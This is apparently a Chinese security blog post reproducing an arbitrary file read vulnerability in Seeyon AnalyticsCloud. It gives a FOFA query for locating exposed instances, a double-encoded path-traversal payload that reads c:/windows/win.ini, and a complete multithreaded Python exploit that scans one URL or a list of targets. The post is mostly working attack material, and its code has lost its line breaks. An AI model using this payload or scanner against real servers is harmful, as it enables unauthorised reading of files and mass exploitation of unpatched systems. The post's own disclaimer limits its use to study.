致远AnalyticsCloud分析云任意文件读取漏洞复现

产品界面图：

FOFA："AnalyticsCloud分析云"

GET请求payload即可读取文件内容

paylaod:
/.%252e/.%252e/c:/windows/win.ini/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini

 

EXP：

import requests
import argparse
import urllib3
import warnings
import threading
import time# 忽略目标计算机积极关闭的问题
requests.packages.urllib3.disable_warnings()# 忽略SSL证书验证的问题
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','Cache-Control': 'max-age=0','Sec-Ch-Ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9',
}payload = "/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini"def ACloud(url):url = url.rstrip("/")AC_url = url + payloadtry:AC_re = requests.get(AC_url, headers=headers, verify=False, timeout=1)if "[fonts]" in AC_re.text:print("\033[32m[+]" + "漏洞存在，请访问" + AC_url + "\033[0m")except Exception as e:print("漏洞不存在或请求失败")def ACloud_Scan_file(url):url = url.rstrip("/")ACfile_url = url + payloadtry:ACfile_re = requests.get(ACfile_url, headers=headers, verify=False, timeout=1)if "[fonts]" in ACfile_re.text:result = "\033[32m[+]" + ACfile_url + "\033[0m"#防止同一个目标多次输出if result not in ACloud_Scan_urls:ACloud_Scan_urls.add(result)print(result)except Exception as e:print("\033[31m[-]" + url + "\033[0m")if __name__ == '__main__':parser = argparse.ArgumentParser(description="2024.07.06")parser.add_argument('-u', '--url'.strip(), help='eg: -u http://www.xx.com')parser.add_argument('-f', '--file'.strip(), help='eg: -f urls.txt')args = parser.parse_args()if (args.url):ACloud(args.url)elif (args.file):with open(args.file,'r') as f:ACloud_urls = [line.strip() for line in f if line.strip()]ACloud_Scan_urls = set()threads = []for AC_url in ACloud_urls:thread = threading.Thread(target=ACloud_Scan_file, args=(AC_url,))thread.start()threads.append(thread)for thread in threads:thread.join()else:print(parser.format_help())

声明：漏洞利用脚本仅供学习参考，请遵守相关法律法规，切勿非法渗透，后果自负。